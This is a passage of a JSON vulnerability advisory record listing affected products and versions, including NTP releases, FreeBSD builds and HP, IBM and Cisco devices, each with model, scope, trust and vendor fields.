        "scope": "eq",
        "trust": 0.6,
        "vendor": "ntp",
        "version": "4.3.67"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ntp",
        "version": "4.3.74"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ntp",
        "version": "4.3.68"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ntp",
        "version": "4.3.69"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ntp",
        "version": "4.3.72"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ntp",
        "version": "4.3.73"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ntp",
        "version": "4.3.75"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ntp",
        "version": "4.3.76"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ntp",
        "version": "4.3.71"
      },
      {
        "model": "taa switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10508-v0"
      },
      {
        "model": "switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105080"
      },
      {
        "model": "10.2-rc1-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3.0.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "taa switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105080"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.211"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "qlogic virtual fabric extension module for ibm bladecenter",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.3.14.0"
      },
      {
        "model": "extremexos",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "21.1"
      },
      {
        "model": "flexfabric 7.2tbps taa-compliant fabric/main processing uni",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79100"
      },
      {
        "model": "flexfabric 2qsfp+ 2-slot switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59300"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "1950-24g-2sfp+-2xgt-poe+ switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.1"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "hsr6800 rse-x3 router main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "24g 4sfp+ hi 1-slot switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55100"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.24"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.0.0"
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3400"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "small business series wireless access points",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3210"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
        "model": "48g 4sfp+ 1-slot hi switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51300"
      },
      {
        "model": "extremexos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.7.4"
      },
      {
        "model": "jabber guest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0(2)"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.219"
      },
      {
        "model": "10.1-release-p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "smartcloud entry appliance fi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.4"
      },
      {
        "model": "5130-24g-4sfp+ ei brazil switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.2"
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.2"
      },
      {
        "model": "prime license manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "visual quality experience server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "9.3-release-p22",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "ff 12508e dc switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "10.1-rc1-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.22"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.4.0"
      },
      {
        "model": "5130-48g-poe+-4sfp+ ei brazil switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "prime collaboration assurance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "hsr6602-xg taa-compliant router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "flexfabric 12904e switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "9.3-release-p10",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "extremexos patch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.7.38"
      },
      {
        "model": "1950-48g-2sfp+-2xgt switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "mpu w/comware os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "12500v70"
      },
      {
        "model": "prime infrastructure standalone plug and play gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ff 12518e dc switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "5130-24g-poe+-4sfp+ ei brazil switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "qlogic 8gb intelligent pass-thru module and san switch module",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.10.1.37.00"
      },
      {
        "model": "dc switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125040"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.4"
      },
      {
        "model": "ruggedcom rox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "1.0"
      },
      {
        "model": "flexfabric 2.4tbps fabric main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7910/0"
      },
      {
        "model": "4.2.8p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "prime access registrar appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "scos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "flexfabric taa-compliant switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79100"
      },
      {
        "model": "10.1-release-p17",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "msr2003 taa-compliant ac router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "10.1-releng",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.44"
      },
      {
        "model": "ntp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.2.6"
      },
      {
        "model": "main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125000"
      },
      {
        "model": "msr2004-48 router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "flexfabric 5700-32xgt-8xg-2qsfp+ taa-compliant switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "5900af-48xg-4qsfp+ taa switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "clean access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "xenserver common criteria",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.0.2"
      },
      {
        "model": "common services platform collector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ac switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125080"
      },
      {
        "model": "9.3-beta3-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "media experience engines",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "wap371 wireless access point",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "flexfabric 12916e switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "p1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ntp",
        "version": "4.2.2"
      },
      {
        "model": "flexfabric 5700-48g-4xg-2qsfp+ switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "10.1-rc2-p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "enterprise linux server eus 6.7.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "10.1-release-p23",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "xenserver sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.2.0"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "flexfabric 7.2tbps fabric main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7910/0"
      },
      {
        "model": "hsr6808 router chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.42"
      },
      {
        "model": "hsr6800 rse-x2 router taa-compliant main processing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "msr1003-8s ac router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "5130-24g-sfp-4sfp+ ei switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "flexfabric 12900e main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "sentinel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ucs director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "msr4060 router chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "ff 12500e mpu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "ruggedcom rox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "1.14.5"
      },
      {
        "model": "telepresence isdn link",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "1950-24g-4xg switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "48g poe+ 4sfp+ 1-slot hi switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51300"
      },
      {
        "model": "physical access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "flexfabric 32qsfp+ switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59300"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "ac switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125180"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.08"
      },
      {
        "model": "5130-48g-poe+-2sfp+-2xgt ei switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "msr4000 mpu-100 main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7.2.0"
      },
      {
        "model": "smartcloud entry appliance fp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.0.4"
      },
      {
        "model": "nac guest server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "enterprise content delivery system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.1"
      },
      {
        "model": "vsr1001 comware virtual services router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "70"
      },
      {
        "model": "9.3-rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "flexfabric 12904e main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "9.3-beta1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.08"
      },
      {
        "model": "5130-24g-4sfp+ ei switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "10.2-rc2-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "ff 12508e ac switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "smartcloud entry appliance fp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.0.3"
      },
      {
        "model": "10.1-rc2-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "video delivery system recorder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "msr4080 router chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.213"
      },
      {
        "model": "10.1-release",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7.3.0"
      },
      {
        "model": "websphere datapower xc10 appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5"
      },
      {
        "model": "msr3044 router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "5130-48g-4sfp+ ei brazil switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "4.2.5p186",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "9.3-release-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.22"
      },
      {
        "model": "9.3-stable",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "10.1-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "msr3064 router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "48g poe+ 4sfp+ hi 1-slot switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55100"
      },
      {
        "model": "10.1-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "netsight appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.0"
      },
      {
        "model": "4.2.5p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "msr2004-24 ac router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "flexfabric 32qsfp+ taa-compliant switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59300"
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.1"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.2"
      },
      {
        "model": "automation stratix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "rockwell",
        "version": "590015.6.3"
      },
      {
        "model": "9.3-rc2-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "flex system fc3171 8gb san switch and san pass-thru",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0.00"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.46"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.3"
      },
      {
        "model": "unity express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.26"
      },
      {
        "model": "10.2-rc1-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "flexfabric 2qsfp+ 2-slot taa-compliant switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59300"
      },
      {
        "model": "switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75030"
      },
      {
        "model": "switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75060"
      },
      {
        "model": "4.2.8p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "ntp",
        "version": null
      },
      {
        "model": "hsr6602-g taa-compliant router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "netsight appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.3"
      },
      {
        "model": "telepresence exchange system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "5130-24g-poe+-2sfp+-2xgt ei switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "flexfabric main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "119000"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "10.1-beta1-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "automation stratix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rockwell",
        "version": "59000"
      },
      {
        "model": "9.3-release-p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.32"
      },
      {
        "model": "5130-24g-poe+-4sfp+ ei switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.3"
      },
      {
        "model": "switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75020"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "msr3024 taa-compliant ac router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "hosted collaboration mediation fulfillment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.0"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.34"
      },
      {
        "model": "5900af 48g 4xg 2qsfp+ taa-compliant",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "flexfabric switch ac chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129160"
      },
      {
        "model": "10.1-stable",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "type a mpu w/comware os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10500v70"
      },
      {
        "model": "dc switch chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125080"
      },
      {
        "model": "5900af-48xgt-4qsfp+ switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "intrusion prevention system solutions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime access registrar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "onepk all-in-one vm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "xenserver sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.5"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.0"
      },
      {
        "model": "msr3024 dc router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "flexfabric switch ac chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129100"
      },
      {
        "model": "9.3-beta1-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-release-p25",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "summit wm3000 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "0"
      },
      {
        "model": "hsr6800 rse-x2 router main processing unit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "series ip phones vpn feature",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8800-0"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.21"
      },
      {
        "model": "small business series wireless access points",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1210"
      },
      {
        "model": "msr3012 dc router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "5130-48g-poe+-4sfp+ ei switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "industrial router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9100"
      },
      {
        "model": "10.2-beta2-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "vsr1008 comware virtual services router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "70"
      },
      {
        "model": "smartcloud entry fixpack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.0.33"
      },
      {
        "model": "type d taa-compliant with comware os main processing un",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10500v70"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.2"
      },
